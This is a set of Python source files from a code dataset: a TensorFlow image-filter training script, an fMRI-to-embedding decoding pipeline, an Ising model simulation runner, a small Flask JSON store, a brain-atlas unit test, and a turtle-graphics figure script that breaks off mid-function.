ksize=self.pool_kernel_size,\n strides=(1,1,1,1),\n padding=\"SAME\")\n\n\n\n\n self.conv3_weights = tf.get_variable(name=myScope+\"_conv3_weights\",\n shape=[6,6,filters,filters])\n self.conv3_bias = tf.constant(1., shape=[filters])\n self.conv3_raw = tf.nn.conv2d(input=self.conv2,\n filter=self.conv3_weights,\n strides=[1,1,1,1], # strides are [batch, height, width, channels]\n padding=\"SAME\",\n name=myScope+\"_conv3\")\n self.conv3_activated = tf.nn.relu(tf.nn.bias_add(value=self.conv3_raw,\n bias=self.conv3_bias))\n self.conv3 = tf.nn.max_pool(value=self.conv3_activated,\n ksize=self.pool_kernel_size,\n strides=(1,1,1,1),\n padding=\"SAME\")\n\n\n\n # split the filters into 4 different sets, a number divisible by 3, a set of images for each channel (RGB)\n # allows splitting [1, 136, 136, 12] into 4x[1, 136, 136, 3]\n self.sets = tf.split(value=self.conv3,\n num_or_size_splits=int(filters/3),\n axis=3)\n self.output = tf.reduce_mean(self.sets, axis=0)\n\n\n\n self.target = tf.placeholder(shape=[None,136,136,3],\n dtype=tf.float32)\n self.loss = tf.losses.mean_squared_error(labels=self.target,\n predictions=self.output)\n\n self.trainer = tf.train.AdamOptimizer(learning_rate=self.learning_rate).minimize(self.loss)\n\n\ndef implement_network_05(input_image, target_image, output_implemetation='05'):\n learning_rate = 1e-4\n raw_image = ()\n raw_target = ()\n if isinstance(input_image, tuple):\n for each in input_image:\n each = cv2.cvtColor(cv2.imread(filename=each), cv2.COLOR_BGR2RGB)\n each = np.expand_dims(each, axis=0)\n if len(raw_image) < 1:\n raw_image = each\n else:\n raw_image = np.vstack((raw_image, each))\n else:\n raw_image = cv2.cvtColor(cv2.imread(filename=input_image), cv2.COLOR_BGR2RGB)\n raw_image = np.expand_dims(raw_image, axis=0)\n if isinstance(target_image, tuple):\n for each in target_image:\n each = cv2.cvtColor(cv2.imread(filename=each), cv2.COLOR_BGR2RGB)\n each = np.expand_dims(each, axis=0)\n if len(raw_target) < 1:\n raw_target = each\n else:\n raw_target = np.vstack((raw_target, each))\n else:\n raw_target = cv2.cvtColor(cv2.imread(filename=target_image), cv2.COLOR_BGR2RGB)\n raw_target = np.expand_dims(raw_target, axis=0)\n\n tf.reset_default_graph()\n model = network05(myScope='Nothing_knew', filters=12, learning_rate=learning_rate)\n init = tf.global_variables_initializer()\n conv1_images = []\n output_images = []\n\n with tf.Session() as sess:\n sess.run(init)\n\n total_steps = 10000\n for i in range(total_steps+1):\n _, loss, conv1, conv2, conv3, output = sess.run(fetches=[model.trainer,\n model.loss,\n model.conv1,\n model.conv2,\n model.conv3,\n model.output],\n feed_dict={model.input:raw_image,\n model.target:raw_target})\n print('Step {0:4>d} - loss = {1:,f}\\t\\tconv1 shape is {2:}'.format(i, loss, conv1.shape))\n\n # create a mural of the filtered images\n conv1_processed = np.reshape(a=conv1[0],\n newshape=(conv1[0].shape[1], conv1[0].shape[0] * conv1[0].shape[2]),\n order='F')\n conv2_processed = np.reshape(a=conv2[0],\n newshape=(conv2[0].shape[1], conv2[0].shape[0] * conv2[0].shape[2]),\n order='F')\n conv3_processed = np.reshape(a=conv3[0],\n newshape=(conv3[0].shape[1], conv3[0].shape[0] * conv3[0].shape[2]),\n order='F')\n\n conv_processed = np.vstack((conv1_processed, conv2_processed, conv3_processed))\n\n skip = 100\n # process filter images for gif\n if i%skip == 0:\n f = 'frame {0: 7,d} loss {1: 10,.1f}'.format(i, loss)\n _, buffer = cv2.imencode(\".png\", conv_processed)\n io_buf = io.BytesIO(buffer)\n decoded_img = 
cv2.imdecode(np.frombuffer(io_buf.getbuffer(), np.uint8), 1)\n _, w, c = decoded_img.shape\n header = np.ones(shape=(20, w, c), dtype=np.uint8)\n header.fill(255)\n cv2.putText(header, f, (2,18), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (0,0,0), 1)\n decoded_img = np.concatenate((header, decoded_img))\n conv1_images.append(decoded_img)\n if i+1 == total_steps:\n for x in range(10):\n conv1_images.append(decoded_img)\n\n # process output image for gif\n # add the raw_input image next to the output image\n if input_image == target_image:\n output_processed = np.hstack((raw_image[0], output[0]))\n else:\n output_processed = np.hstack((raw_image[0], output[0], raw_target[0]))\n\n _, w, c = output_processed.shape\n header = np.ones(shape=(20, w, c), dtype=np.uint8)\n header.fill(255)\n cv2.putText(header, f, (2,18), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (0,0,0), 1)\n\n footer_text_1 = \"input\"\n footer_text_2 = \"output\"\n footer_text_3 = \"target\"\n footer = np.ones(shape=(24, w, c), dtype=np.uint8)\n footer.fill(255)\n cv2.putText(footer, footer_text_1, (30,18), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (0,0,0), 1)\n cv2.putText(footer, footer_text_2, (168,18), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (0,0,0), 1)\n cv2.putText(footer, footer_text_3, (306,18), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (0,0,0), 1)\n\n output_processed = np.concatenate((header, output_processed, footer))\n\n _, buffer = cv2.imencode(\".png\", output_processed)\n io_buf = io.BytesIO(buffer)\n decoded_img = cv2.imdecode(np.frombuffer(io_buf.getbuffer(), np.uint8), -1)\n output_images.append(decoded_img)\n if i+1 == total_steps:\n for x in range(10):\n output_images.append(decoded_img)\n\n make_gif(conv1_images, './output/conv_' + output_implemetation + '.gif', fps=15)\n make_gif(output_images, './output/output_' + output_implemetation + '.gif', fps=15)\n\n raw_image = cv2.cvtColor(cv2.imread(filename='./RGB01.png'), cv2.COLOR_BGR2RGB)\n raw_image = np.expand_dims(raw_image, axis=0)\n output = sess.run(fetches=[model.output], feed_dict={model.input:raw_image})\n cv2.imwrite(filename='./output1.png', img=output[0][0])\n\n#implement_network_04b(input_image='./RGB01plus.png', target_image='./RGB03.png', output_implemetation='04b_01_6x6pool')\n#implement_network_04b(input_image='./RGB01.png', target_image='./RGB03.png', output_implemetation='04b_02_6x6pool')\n\n\n\n","sub_path":"Network_05/network_05.py","file_name":"network_05.py","file_ext":"py","file_size_in_byte":10574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"412664876","text":"import scipy.io\nfrom tqdm import tqdm\nimport pickle\nimport numpy as np\nimport sys\nimport math\nfrom scipy.linalg import lstsq\nfrom sklearn.model_selection import KFold\nimport argparse\nimport os\nimport helper\nfrom scipy.stats import spearmanr\nfrom sklearn.linear_model import Ridge, RidgeCV\nimport scipy.stats as stats\nfrom sklearn.model_selection import train_test_split\n# import statsmodels.api as sm\n\ndef all_activations_for_all_sentences(modified_activations, volmask, embed_matrix, args, radius=5, kfold_split=5, alpha=1):\n\tglobal temp_file_name\n\n\tprint(\"getting activations for all sentences...\")\n\tres_per_spotlight = []\n\tpredictions = []\n\trankings = []\n\tllhs = []\n\ta,b,c = volmask.shape\n\tnonzero_pts = np.transpose(np.nonzero(volmask))\n\ttrue_spotlights = []\n\n\t# iterate over spotlight\n\tprint(\"for each spotlight...\")\n\n\tindex=0\n\tnn_matrix = calculate_dist_matrix(embed_matrix) if args.rsa else None \n\tfor pt in 
nonzero_pts:\n\t\tx1,y1,z1 = pt\n\t\tspotlights = []\n\t\t# iterate over each sentence\n\t\tfor sentence_act in modified_activations:\n\t\t\tspot = sentence_act[x1][y1][z1]\n\t\t\tremove_nan = np.nan_to_num(spot).astype(np.float32)\n\t\t\tspotlights.append(remove_nan)\n\n\t\tprint(np.array(spotlights).shape)\n\n\t\ttrue_spotlights.append(spotlights)\n\n\t\t## DECODING BELOW\n\t\tif args.rsa: \n\t\t\tres = rsa(nn_matrix, np.array(spotlights))\n\t\telse: \n\t\t\tres, pred, llh, rank = linear_model(embed_matrix, spotlights, args, kfold_split, alpha)\n\t\t\tpredictions.append(pred)\n\t\t\tllhs.append(llh)\n\t\t\trankings.append(rank)\n\t\t\tprint(\"LLH: \" + str(llh))\n\t\t\tprint(\"RANK: \" + str(rank))\n\n\t\tprint(\"RES for SPOTLIGHT #\", index, \": \", res)\n\t\tres_per_spotlight.append(res)\n\n\t\tindex+=1\n\t\t## DECODING ABOVE\n\n\treturn res_per_spotlight, llhs, rankings\n\n### RSA ###\ndef calculate_dist_matrix(matrix_embeddings): \n\tn = matrix_embeddings.shape[0]\n\tmat = np.zeros(shape=(n*(n-1)//2,))\n\tcosine_sim = lambda x, y: np.dot(x, y) / (np.linalg.norm(x, ord=2) * np.linalg.norm(y, ord=2))\n\tit = 0\n\tfor i in range(n): \n\t\tfor j in range(i):\n\t\t\tmat[it] = cosine_sim(matrix_embeddings[i], matrix_embeddings[j]) \n\t\t\tit += 1\n\treturn mat \n\ndef rsa(embed_matrix, spotlights): \n\tspotlight_mat = calculate_dist_matrix(spotlights)\n\tcorr, _ = spearmanr(spotlight_mat, embed_matrix)\n\treturn corr\n\n### LIKELIHOOD ###\ndef find_log_pdf(arr, sigmas):\n\tval = stats.norm.logpdf(arr, 0, sigmas)\n\treturn np.nansum(val)\n\ndef vectorize_llh(pred, data, sigmas):\n\tresiduals = np.subtract(data, pred)\n\tllh = np.nansum(stats.norm.logpdf(residuals, 0, sigmas))\n\treturn llh\n\n### SPECIFYING THE LINEAR MODEL ### \ndef linear_model(embed_matrix, spotlight_activations, args, kfold_split, alpha):\n\tglobal predicted_trials\n\n\tpredicted = []\n\tif args.brain_to_model:\n\t\tfrom_regress = np.array(spotlight_activations)\n\t\tto_regress = np.array(embed_matrix)\n\telse:\n\t\tfrom_regress = np.array(embed_matrix)\n\t\tto_regress = np.array(spotlight_activations)\n\n\tprint(\"FROM REGRESS: \" + str(from_regress.shape))\n\tprint(\"TO REGRESS: \" + str(to_regress.shape))\n\n\tif args.cross_validation:\n\t\touter_kf = KFold(n_splits=kfold_split, shuffle=True)\n\n\t\terrors = []\n\t\tpredicted_trials = np.zeros((to_regress.shape[0],))\n\t\tllhs = []\n\t\trankings = []\n\n\t\tif args.add_bias:\n\t\t\tfrom_regress = helper.add_bias(from_regress)\n\n\t\tif args.permutation:\n\t\t\tnp.random.shuffle(from_regress)\n\n\t\tfor train_index, test_index in outer_kf.split(from_regress):\n\t\t\tgreatest_possible_rank = len(test_index)\n\n\t\t\tX_train, X_test = from_regress[train_index], from_regress[test_index]\n\t\t\ty_train, y_test = to_regress[train_index], to_regress[test_index]\n\n\t\t\t# nested CV\n\t\t\tinner_kf = KFold(n_splits=kfold_split, shuffle=True)\n\t\t\talphas = np.logspace(-10, 10, 21, endpoint=True) \n\t\t\tclf = RidgeCV(alphas=alphas).fit(X_train, y_train)\n\t\t\tbest_alpha = clf.alpha_\n\n\t\t\t# with ridge regression\n\t\t\tclf = Ridge(alpha=best_alpha)\n\t\t\tclf.fit(X_train, y_train)\n\t\t\ty_hat_test = clf.predict(X_test)\n\t\t\tpredicted_trials[test_index] = y_hat_test\n\n\t\t\tif args.llh:\n\t\t\t\tn = X_train.shape[0]\n\t\t\t\tk = X_train.shape[1]\n\t\t\t\ty_hat_train = clf.predict(X_train)\n\t\t\t\tsigma_train = np.sum((y_hat_train - y_train)**2, axis=0)\n\t\t\t\tllh = vectorize_llh(y_hat_test, y_test, sigma_train)\n\t\t\t\tllhs.append(llh)\n\n\t\t\tif args.ranking 
and args.model_to_brain:\n\t\t\t\ty_hat_test_reshape = y_hat_test.reshape((len(y_hat_test), 1))\n\t\t\t\ty_test_reshape = y_test.reshape((len(y_test), 1))\n\n\t\t\t\ttrue_distances = helper.calculate_true_distances(y_hat_test_reshape, y_test_reshape)\n\t\t\t\tprint(\"TRUE DISTANCES: \" + str(true_distances.shape))\n\t\t\t\tdistance_matrix = helper.compute_distance_matrix(y_hat_test_reshape, y_test_reshape)\n\t\t\t\tprint(\"DISTANCE MATRIX: \" + str(distance_matrix.shape))\n\t\t\t\trank = helper.calculate_rank(true_distances, distance_matrix)\n\t\t\t\trank_accuracy = 1 - (rank - 1) * 1.0 / (greatest_possible_rank - 1)\n\t\t\t\trankings.append(rank_accuracy)\n\t\terrors = np.sqrt(np.sum(np.abs(np.array(predicted_trials) - to_regress)))\n\t\treturn errors.astype(np.float32), predicted_trials, np.sum(llhs).astype(np.float32), np.mean(rankings).astype(np.float32)\n\treturn\n\n### MIXED EFFECTS ANALYSIS ###\ndef get_modified_activations(activations, volmask):\n\ti,j,k = volmask.shape\n\tnonzero_pts = np.transpose(np.nonzero(volmask))\n\tmodified_activations = []\n\tfor sentence_activation in tqdm(activations):\n\t\tone_sentence_act = np.zeros((i,j,k))\n\t\tfor pt in range(len(nonzero_pts)):\n\t\t\tx,y,z = nonzero_pts[pt]\n\t\t\tone_sentence_act[int(x)][int(y)][int(z)] = sentence_activation[pt]\n\t\tmodified_activations.append(one_sentence_act)\n\treturn modified_activations\n\ndef run_per_voxel(df, labels, conditional_labels):\n\ttraining_data, testing_data = train_test_split(df, test_size=0.2)\n\n\tmd = smf.mixedlm('embedding ~ 1 + ' + str(labels) + ' + (1 + ' + str(conditional_labels) + ' )', training_data, groups=training_data[\"subject_number\"])\n\tmdf = md.fit()\n\tprint(mdf.summary())\n\n\ty_hat_test = mdf.predict(testing_data)\n\ty_true = testing_data['activations']\n\n\tprint(\"CHECK SIZE: \")\n\trmse = np.sqrt(np.sum(np.abs(y_hat_test - y_true)))\n\treturn rmse\n\ndef mixed_effects_analysis(args, embed_matrix):\n\t# load common brain space\n\tsubjects = [1,2,4,5,7,8,9,10,11]\n\tcommon_space = helper.load_common_space(subjects, local=args.local)\n\tvoxel_coordinates = np.transpose(np.nonzero(common_space))\n\tnum_voxels = len(voxel_coordinates)\n\tprint(\"NUM VOXELS IN SHARED COMMON BRAIN SPACE: \" + str(num_voxels))\n\n\t# initialize variables\n\tall_activations = []\n\tsubj_number = []\n\tvoxel_index = []\n\n\t# prepare model embeddings \n\tdim_labels = ['dim'+str(i) for i in range(embed_matrix.shape[1])]\n\tembed_matrix_pd = pd.DataFrame(embed_matrix, columns=dim_labels)\n\tembed_matrix_pd_repeat = pd.concat([embed_matrix_pd]*len(subjects), ignore_index=True)\n\tprint(\"LENGTH OF EMBEDDINGS: \" + str(len(embed_matrix_pd_repeat)))\n\n\t# get labels\n\tlabels = \"\"\n\tconditional_labels = \"\"\n\tfor i in range(embed_matrix.shape[1]):\n\t\tlabels += 'dim' + str(i) + ' '\n\t\tconditional_labels += 'dim' + str(i) + ' | subject_number '\n\n\t# get data (load each subject's own activations file)\n\tfor subj in subjects:\n\t\tactivation = pickle.load( open( f\"/n/shieber_lab/Lab/users/cjou/fmri/subj{subj}/activations.p\", \"rb\" ) )\n\t\tactivation_vals = activation[np.nonzero(common_space)]\n\t\tmodified_activations = get_modified_activations(activation_vals, common_space)\n\t\tall_activations.append(modified_activations)\n\t\tvoxel_index.append(range(num_voxels))\n\t\tsubj_number.extend([subj] * num_voxels)\n\t\n\t# create dataframe\n\tdata = pd.DataFrame({\n\t\t'subject_number': subj_number,\n\t\t'voxel_index': voxel_index,\n\t\t'activations': all_activations\n\t\t})\n\n\tdata_slice = 
data.loc[data[\"voxel_index\"] == 0]\n\tprint(\"DATA SLICE LENGTH: \" + str(len(data_slice)))\n\n\t# per voxel\n\trmses_per_voxel = []\n\tfor v in range(num_voxels):\n\t\tdata_slice = data.loc[data[\"voxel_index\"] == v]\n\t\tconcat_pd = pd.concat([data_slice, embed_matrix_pd_repeat], axis=1)\n\t\trmse = run_per_voxel(concat_pd, labels, conditional_labels)\n\t\trmses_per_voxel.append(rmse)\n\t\t\n\treturn rmses_per_voxel\n\ndef main():\n\tglobal temp_file_name\n\n\targparser = argparse.ArgumentParser(description=\"Decoding (linear reg) step for correlating NN and brain\")\n\targparser.add_argument('--embedding_layer', type=str, help=\"Location of NN embedding (for a layer)\", required=True)\n\targparser.add_argument(\"--rsa\", action='store_true', default=False, help=\"True if RSA is used to generate residual values\")\n\targparser.add_argument(\"--brain_to_model\", action='store_true', default=False, help=\"True if regressing brain to model, False if not\")\n\targparser.add_argument(\"--model_to_brain\", action='store_true', default=False, help=\"True if regressing model to brain, False if not\")\n\targparser.add_argument(\"--which_layer\", help=\"Layer of interest in [1: total number of layers]\", type=int, default=1)\n\targparser.add_argument(\"--cross_validation\", action='store_true', default=True, help=\"True if add cross validation, False if not\")\n\targparser.add_argument(\"--subject_number\", type=int, default=1, help=\"subject number (fMRI data) for decoding\")\n\targparser.add_argument(\"--random\", action='store_true', default=False, help=\"True if initialize random brain activations, False if not\")\n\targparser.add_argument(\"--rand_embed\", action='store_true', default=False, help=\"True if initialize random embeddings, False if not\")\n\targparser.add_argument(\"--glove\", action='store_true', default=False, help=\"True if initialize glove embeddings, False if not\")\n\targparser.add_argument(\"--word2vec\", action='store_true', default=False, help=\"True if initialize word2vec embeddings, False if not\")\n\targparser.add_argument(\"--bert\", action='store_true', default=False, help=\"True if initialize bert embeddings, False if not\")\n\targparser.add_argument(\"--normalize\", action='store_true', default=False, help=\"True if add normalization across voxels, False if not\")\n\targparser.add_argument(\"--permutation\", action='store_true', default=False, help=\"True if permutation, False if not\")\n\targparser.add_argument(\"--permutation_region\", action='store_true', default=False, help=\"True if permutation by brain region, False if not\")\n\targparser.add_argument(\"--add_bias\", action='store_true', default=True, help=\"True if add bias, False if not\")\n\targparser.add_argument(\"--llh\", action='store_true', default=True, help=\"True if calculate likelihood, False if not\")\n\targparser.add_argument(\"--ranking\", action='store_true', default=False, help=\"True if calculate ranking, False if not\")\n\targparser.add_argument(\"--mixed_effects\", action='store_true', default=False, help=\"True if calculate mixed effects, False if not\")\n\n\t### UPDATE FILE PATHS HERE ###\n\targparser.add_argument(\"--fmri_path\", default=\"/n/shieber_lab/Lab/users/cjou/fmri/\", type=str, help=\"file path to fMRI data on the Odyssey cluster\")\n\targparser.add_argument(\"--to_save_path\", default=\"/n/shieber_lab/Lab/users/cjou/\", type=str, help=\"file path to and create rmse/ranking/llh on the Odyssey cluster\")\n\t### UPDATE FILE PATHS HERE ###\n\t\n\targs = 
argparser.parse_args()\n\n\tif not args.glove and not args.word2vec and not args.bert and not args.rand_embed:\n\t\tembed_loc = args.embedding_layer\n\t\tfile_name = embed_loc.split(\"/\")[-1].split(\".\")[0]\n\t\tembedding = scipy.io.loadmat(embed_loc)\n\t\tembed_matrix = helper.get_embed_matrix(embedding)\n\telse:\n\t\tembed_loc = args.embedding_layer\n\t\tfile_name = embed_loc.split(\"/\")[-1].split(\".\")[0].split(\"-\")[-1] + \"_layer\" + str(args.which_layer) # aggregation type + which layer\n\t\tembed_matrix = np.array(pickle.load( open( embed_loc , \"rb\" ) ))\n\n\tdirection, validate, rlabel, elabel, glabel, w2vlabel, bertlabel, plabel, prlabel = helper.generate_labels(args)\n\n\t# get modified activations\n\tactivations = pickle.load( open( \"{}subj{}/activations.p\".format(args.fmri_path, args.subject_number), \"rb\" ) )\n\tvolmask = pickle.load( open( \"{}subj{}/volmask.p\".format(args.fmri_path, args.subject_number), \"rb\" ) )\n\tmodified_activations = pickle.load( open( \"{}subj{}/modified_activations.p\".format(args.fmri_path, args.subject_number), \"rb\" ) )\n\n\tprint(\"PERMUTATION: \" + str(args.permutation))\n\tprint(\"PERMUTATION REGION: \" + str(args.permutation_region))\n\n\tprint(\"PLABEL: \" + str(plabel))\n\tprint(\"PRLABEL: \" + str(prlabel))\n\n\tif args.normalize:\n\t\tmodified_activations = helper.z_score(modified_activations)\n\t\tembed_matrix = helper.z_score(embed_matrix)\n\n\tif args.random:\n\t\tprint(\"RANDOM ACTIVATIONS\")\n\t\tmodified_activations = np.random.randint(-20, high=20, size=(240, 79, 95, 68))\n\n\t# make file path\n\tif not os.path.exists('{}residuals_od32/'.format(args.to_save_path)):\n\t\tos.makedirs('{}residuals_od32/'.format(args.to_save_path))\n\n\tif not os.path.exists('{}final_rankings/'.format(args.to_save_path)):\n\t\tos.makedirs('{}final_rankings/'.format(args.to_save_path))\n\n\tif not os.path.exists('{}rsa/'.format(args.to_save_path)):\n\t\tos.makedirs('{}rsa/'.format(args.to_save_path))\n\n\tif not os.path.exists('{}nested_llh/'.format(args.to_save_path)):\n\t\tos.makedirs('{}nested_llh/'.format(args.to_save_path))\n\n\ttemp_file_name = str(plabel) + str(prlabel) + str(rlabel) + str(elabel) + str(glabel) + str(w2vlabel) + str(bertlabel) + str(direction) + str(validate) + \"-subj\" + str(args.subject_number) + \"-\" + str(file_name) + \"_no_spotlight\"\n\t\n\tif args.mixed_effects:\n\t\tval = mixed_effects_analysis(args, embed_matrix)\n\telse:\n\t\tall_residuals, llhs, rankings = all_activations_for_all_sentences(modified_activations, volmask, embed_matrix, args)\n\n\t# dump\n\tif args.rsa:\n\t\tfile_name = '{}rsa/'.format(args.to_save_path) + str(temp_file_name) + \".p\"\n\t\tpickle.dump( all_residuals, open(file_name, \"wb\" ) )\n\t\n\telse:\n\t\tif args.llh:\n\t\t\tllh_file_name = '{}nested_llh/'.format(args.to_save_path) + temp_file_name\n\t\t\tprint(\"LLH SPOTLIGHTS FILE: \" + str(llh_file_name))\n\t\t\tpickle.dump( llhs, open(llh_file_name+\"-llh.p\", \"wb\" ), protocol=-1 )\n\n\t\taltered_file_name = '{}residuals_od32/'.format(args.to_save_path) + temp_file_name\n\t\tprint(\"RESIDUALS FILE: \" + str(altered_file_name))\n\t\tpickle.dump( all_residuals, open(altered_file_name + \".p\", \"wb\" ), protocol=-1 )\n\n\t\tif args.model_to_brain and args.ranking:\n\t\t\tranking_file_name = '{}final_rankings/'.format(args.to_save_path) + temp_file_name\n\t\t\tprint(\"RANKING FILE: \" + str(ranking_file_name))\n\t\t\tpickle.dump( rankings, open(ranking_file_name + \".p\", \"wb\" ), protocol=-1 
)\n\n\tprint(\"done.\")\n\n\treturn\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"nested_decoding.py","file_name":"nested_decoding.py","file_ext":"py","file_size_in_byte":14185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"400938735","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\n\nfrom isingmodel.data import SimulationData, SimulationParameters\nfrom isingmodel.lattice import BinaryLattice\nimport isingmodel\n\n\ndef simulation(parameters: SimulationParameters) -> SimulationData:\n \"\"\"Run the Ising model simulation.\n\n :param parameters: Parameters to use for setting up and running the simulation.\n :return: Output of the Ising model simulation.\n \"\"\"\n np.random.seed(parameters.seed)\n\n lattice: BinaryLattice = BinaryLattice(\n parameters.dimensions,\n parameters.neighborhood,\n parameters.interaction_coefficients,\n )\n data: SimulationData = isingmodel.data.setup_containers(\n parameters=parameters,\n state=lattice.sample_random_state(),\n )\n\n pre_simulation(\n lattice=lattice,\n data=data,\n )\n main_simulation(\n lattice=lattice,\n data=data,\n )\n post_simulation(\n lattice=lattice,\n data=data,\n )\n\n return data\n\n\ndef pre_simulation(\n lattice: BinaryLattice,\n data: SimulationData,\n) -> None:\n \"\"\"Run equilibration sweeps.\n\n :param lattice: Structural information and neighbor tables.\n :param data: Data container for the simulation.\n \"\"\"\n for sweep_index in range(data.parameters.equilibration_sweeps):\n isingmodel.sampling.sweep_grid(\n lattice=lattice,\n data=data,\n sweep_index=sweep_index,\n equilibration_run=True,\n )\n\n\ndef main_simulation(\n lattice: BinaryLattice,\n data: SimulationData,\n) -> None:\n \"\"\"Run the production sweeps for the Ising model simulation.\n\n :param lattice: Structural information and neighbor tables.\n :param data: Data container for the simulation.\n \"\"\"\n isingmodel.model.ising_save_full_state(lattice=lattice, data=data)\n for sweep_index in range(data.parameters.sweeps):\n isingmodel.sampling.sweep_grid(\n lattice=lattice,\n data=data,\n sweep_index=sweep_index,\n equilibration_run=False,\n )\n\n\ndef post_simulation(\n lattice: BinaryLattice,\n data: SimulationData,\n) -> None:\n \"\"\"Write the simulation history to disk and print estimators.\n\n :param lattice: Structural information and neighbor tables.\n :param data: Data container for the simulation.\n \"\"\"\n isingmodel.data.write_trace_to_disk(data=data)\n\n average_energy: float = \\\n data.estimators.energy_1st_moment / lattice.number_sites\n fm_order_parameter: float = \\\n data.estimators.magnetization_1st_moment / lattice.number_sites\n afm_order_parameter: float = (\n data.estimators.magnetization_even_sites_1st_moment -\n data.estimators.magnetization_odd_sites_1st_moment\n ) / lattice.number_sites\n print(f\"Average energy = {average_energy}\")\n print(f\"FM order parameter = {fm_order_parameter}\")\n print(f\"AFM order parameter = {afm_order_parameter}\")\n","sub_path":"isingmodel/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"109706485","text":"import json\nfrom flask import Flask, render_template, make_response, url_for, request\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef drawNodes():\n return render_template('index.html')\n\n@app.route('/receiveJSON', methods = ['POST'])\ndef receiveJSON():\n data = request.get_json()\n\n if data != 
None:\n with open('saved_data.json', 'w') as f:\n f.write(json.dumps(data, indent = 2))\n\n return json.dumps(data)\n\n@app.route('/getJSON', methods = ['GET'])\ndef getJSON():\n with open('saved_data.json', 'r') as f:\n data = json.load(f)\n\n return json.dumps(data)\n\nif __name__ == '__main__':\n app.run(debug = True, host = '127.0.0.1', port = 5000)\n","sub_path":"DrawNodes.py","file_name":"DrawNodes.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"277291785","text":"import os\nimport unittest\nfrom siibra.atlas import REGISTRY\nimport siibra as sb\nfrom test.get_token import get_token\n\ntoken = get_token()\nos.environ['HBP_AUTH_TOKEN'] = token[\"access_token\"]\n\nclass TestSelectionBrainRegions(unittest.TestCase):\n\n def test_select_brain_regions(self):\n atlas = REGISTRY.MULTILEVEL_HUMAN_ATLAS\n atlas.select_parcellation(sb.parcellations.JULICH_BRAIN_CYTOARCHITECTONIC_MAPS_2_5)\n # we can just give a string and see if the system can disambiguiate it\n atlas.select_region('v1')\n print(\"Selected region from 'v1' is\", atlas.selected_region)\n self.assertEqual(atlas.selected_region.name, 'Area hOc1 (V1, 17, CalcS)')\n self.assertTrue(len(atlas.selected_region.children) == 2)\n\n print('v1 includes the left and right hemisphere!')\n print(repr(atlas.selected_region))\n\n # we can be more specific easily\n atlas.select_region('v1 left')\n print(\"Selected region from 'v1 left' is\", atlas.selected_region)\n self.assertEqual(atlas.selected_region.name, 'Area hOc1 (V1, 17, CalcS) left')\n self.assertTrue(len(atlas.selected_region.children) == 0)\n\n # we can also auto-complete on the 'regionnames' attribute of the atlas\n # - this immediately leads to a unique selection\n atlas.select_region(atlas.regionnames.AREA_HOC1_V1_17_CALCS_LEFT_HEMISPHERE)\n self.assertEqual(atlas.selected_region.name, 'Area hOc1 (V1, 17, CalcS) left')\n self.assertTrue(len(atlas.selected_region.children) == 0)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"test/test_selecting_brain_regions_from_an_atlas.py","file_name":"test_selecting_brain_regions_from_an_atlas.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"32009171","text":"# Turtle\r\nfrom turtle import *\r\nt = Turtle()\r\nt.speed(0)\r\nt.left(90)\r\n\r\n# Funktionen\r\ndef istPunkt(L):\r\n if type(L) == list:\r\n if len(L) == 2:\r\n if (type(L[0]) == int) and (type(L[1]) == int):\r\n return True\r\n else:\r\n return False\r\n else:\r\n return False\r\n else:\r\n return False\r\n\r\ndef istStreckenzug(L):\r\n if type(L) == list:\r\n if len(L) == 0:\r\n return True\r\n else:\r\n if istPunkt(L[0]):\r\n return istStreckenzug(L[1:])\r\n else:\r\n return False\r\n else:\r\n return False\r\n\r\ndef istFigur(L):\r\n if type(L) == list:\r\n if len(L) == 0:\r\n return True\r\n else:\r\n if istStreckenzug(L[0]) or istFigur(L[0]):\r\n return istFigur(L[1:])\r\n else:\r\n return False\r\n else:\r\n return False\r\n\r\ndef zeichnePunktListe(punktListe):\r\n if punktListe != []:\r\n punkt = punktListe[0]\r\n t.goto(punkt)\r\n zeichnePunktListe(punktListe[1:])\r\n\r\ndef zeichneStreckenzug(streckenzug):\r\n if istStreckenzug(streckenzug): \r\n if streckenzug != []:\r\n punkt = streckenzug[0]\r\n t.up()\r\n t.goto(punkt)\r\n t.down()\r\n zeichnePunktListe(streckenzug[1:])\r\n\r\ndef zeichneFigur(figur):\r\n if istFigur(figur):\r\n if figur != []:\r\n 
objekt = figur[0]\r\n if istStreckenzug(objekt):\r\n zeichneStreckenzug(objekt)\r\n else:\r\n zeichneFigur(objekt)\r\n zeichneFigur(figur[1:])\r\n\r\ndef xVerschiebenPunkt(punkt, x):\r\n if istPunkt(punkt):\r\n return [punkt[0]+x, punkt[1]]\r\n\r\ndef xVerschiebenStreckenzug(streckenzug, x):\r\n if istStreckenzug(streckenzug):\r\n if streckenzug == []:\r\n return []\r\n else:\r\n punkt = streckenzug[0]\r\n restStreckenzug = streckenzug[1:]\r\n return [xVerschiebenPunkt(punkt, x)] + xVerschiebenStreckenzug(restStreckenzug, x)\r\n\r\ndef xVerschiebenFigur(figur, x):\r\n if istFigur(figur):\r\n if figur == []:\r\n return []\r\n else:\r\n erstesElement = figur[0]\r\n restFigur = figur[1:]\r\n if istStreckenzug(erstesElement):\r\n return [xVerschiebenStreckenzug(erstesElement, x)] + xVerschiebenFigur(restFigur, x)\r\n else:\r\n return [xVerschiebenFigur(erstesElement, x)] + xVerschiebenFigur(restFigur, x)\r\n\r\ndef yVerschiebenPunkt(punkt, y):\r\n if istPunkt(punkt):\r\n return [punkt[0], punkt[1] + y]\r\n\r\ndef yVerschiebenStreckenzug(streckenzug, y):\r\n if istStreckenzug(streckenzug):\r\n if streckenzug == []:\r\n return []\r\n else:\r\n punkt = 